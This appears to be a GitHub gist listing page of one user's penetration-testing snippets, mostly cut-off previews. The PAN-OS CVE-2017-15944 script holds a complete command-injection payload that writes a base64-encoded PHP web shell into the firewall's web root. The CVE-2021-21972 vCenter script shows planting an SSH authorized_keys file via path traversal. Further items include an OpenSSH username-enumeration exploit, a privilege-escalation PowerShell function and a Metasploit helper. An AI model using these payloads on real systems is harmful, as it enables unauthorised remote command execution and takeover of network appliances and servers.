Skip to content

Instantly share code, notes, and snippets.

View CVE-2017-15944_1.py
#!/usr/bin/env python
# encoding: utf-8
import requests
import sys
import base64
requests.packages.urllib3.disable_warnings()
session = requests.Session()
def step3_exp():
exp_post = "{\"action\":\"PanDirect\",\"method\":\"execute\",\"data\":[\"07c5807d0d927dcd0980f86024e5208b\",\"Administrator.get\",{\"changeMyPassword\":true,\"template\":\"asd\",\"id\":\"admin']\\\" async-mode='yes' refresh='yes' cookie='../../../../../../var/cores/$(echo PD9waHAgc3lzdGVtKCRfR0VUWyJjIl0pOz8+Cg==|base64 -d >${PATH:0:1}var${PATH:0:1}appweb${PATH:0:1}htdocs${PATH:0:1}api${PATH:0:1}cmd.php).core -print -exec python -c exec(\\\"PD9waHAgc3lzdGVtKCRfR0VUWyJjIl0pOz8+Cg==\\\".decode(\\\"base64\\\")) ;'/>\\u0000\"}],\"type\":\"rpc\",\"tid\":713}"
return exp_post
@milo2012
milo2012 / CVE-2017-15944_2.py
Last active Jul 19, 2021
CVE-2017-15944_2.py
View CVE-2017-15944_2.py
#!/usr/bin/env python
# encoding: utf-8
import requests
import sys
import base64
import time
requests.packages.urllib3.disable_warnings()
session = requests.Session()
path = "/opt/var.cp/cores"
def step3_exp(command):
@milo2012
milo2012 / CVE-2017-15944.md
Last active Jul 18, 2021
CVE-2017-15944.md
View CVE-2017-15944.md

Description

I encountered a situation where the target running PAN-OS was vulnerable to CVE-2017-15944 but I was unable to exploit it using Metasploit.

The issue with exploiting CVE-2017-15944

One of the techniques of exploiting CVE-2017-15944 exploit, is to create a file under /opt/pancfg/mgmt/logdb/traffic/1/* which gets processed by the cron job (/etc/cron.d/indexgen -> /usr/local/bin/genindex_batch.sh). Metasploit uses this technique.

The article at https://tinyhack.com/2019/01/10/alternative-way-to-exploit-cve-2017-15944-on-pan-os-6-1-0/ mentions that it might be impossible to exploit CVE-2017-15944 as the script is already running. The article mentions that the cron job (/etc/cron.d/core_compress -> /usr/local/bin/core_compress) is also vulnerable to command injection.

@milo2012
milo2012 / searchKaliPkg.py
Last active May 17, 2021
Search Kali Repo (http.kali.org)
View searchKaliPkg.py
import sys
import requests
import optparse
from bs4 import BeautifulSoup
import multiprocessing
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
requests.packages.urllib3.disable_warnings()
def getHTML(url):
@milo2012
milo2012 / Get-System.ps1
Last active Apr 14, 2021
Get-System.ps1
View Get-System.ps1
function Get-System {
<#
.SYNOPSIS
GetSystem functionality inspired by Meterpreter's getsystem.
Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: PSReflect
@milo2012
milo2012 / CVE-2010-4180.py
Last active Mar 4, 2021
CVE-2010-4180.py
View CVE-2010-4180.py
'''
#https://www.tenable.com/plugins/nessus/51892
% python3 CVE-2010-4180.py -t x.x.x.x
[*] Connecting using Cipher: ECDHE-RSA-AES256-GCM-SHA384
SSL-Session:
Protocol : TLSv1.2
Cipher : ECDHE-RSA-AES256-GCM-SHA384
Session-ID: 9B36462FA6870CB80E916C0C1B0760D7946EA6464462B8ADF269D38BF1EAC522
Session-ID-ctx:
@milo2012
milo2012 / CVE-2021-21972.py
Last active Feb 26, 2021
CVE-2021-21972.py
View CVE-2021-21972.py
import requests, optparse, concurrent.futures, sys, functools, itertools, tarfile, os, shutil
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
requests.packages.urllib3.disable_warnings()
'''
% python3 /tmp/CVE_2021_21972.py -i /tmp/urls.txt -n 8 -e
[*] Creating tmp.tar containing ../../../../../home/vsphere-ui/.ssh/authorized_keys
[+] https://172.16.164.1 SUCCESS
Login using 'ssh -i id_rsa vsphere-ui@x.x.x.x'
'''
@milo2012
milo2012 / CVE-2018-15473.py
Created Jun 1, 2020
SSH Username Enumeration (CVE-2018-15473) - Supports IPv6
View CVE-2018-15473.py
# Exploit: OpenSSH 7.7 - Username Enumeration
# Author: Justin Gardner
# Date: 2018-08-20
# Software: https://ftp4.usa.openbsd.org/pub/OpenBSD/OpenSSH/openssh-7.7.tar.gz
# Affected Versions: OpenSSH version < 7.7
# CVE: CVE-2018-15473
###########################################################################
# ____ _____ _____ _ _ #
# / __ \ / ____/ ____| | | | #
@milo2012
milo2012 / extractHTTPfromNmap.py
Last active Sep 17, 2019
This script parses nmap XML file and extract HTTP/HTTPs servers. The problem with Nmap scanning is that it doesn't correctly identify all hosts running HTTP/HTTPS services. This script attempts to fix this issue
View extractHTTPfromNmap.py
from libnmap.parser import NmapParser
import requests, optparse, os, sys, glob, multiprocessing
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
requests.packages.urllib3.disable_warnings()
timeout=1.0
numOfThreads=2
#This script parses nmap XML file and extract HTTP/HTTPs servers.
#The problem with Nmap scanning is that it doesn't correctly identify all hosts running HTTP/HTTPS services.
View gist:96ab77e05714915ea22f8c214f838aac
$ sudo python msfHelper1.py nmap__190723_132536.xml
[*] Launching Metasploit msfrpcd
[*] Reading from msfHelper.db
[*] Loaded 474 URI paths from msfHelper.db
[*] Loaded 2982 modules from Metasploit
[List of Unique Service Banners]
-------- ----------------------------------------------------------------------------
21/tcp vsftpd version: 2.3.4 ostype: Unix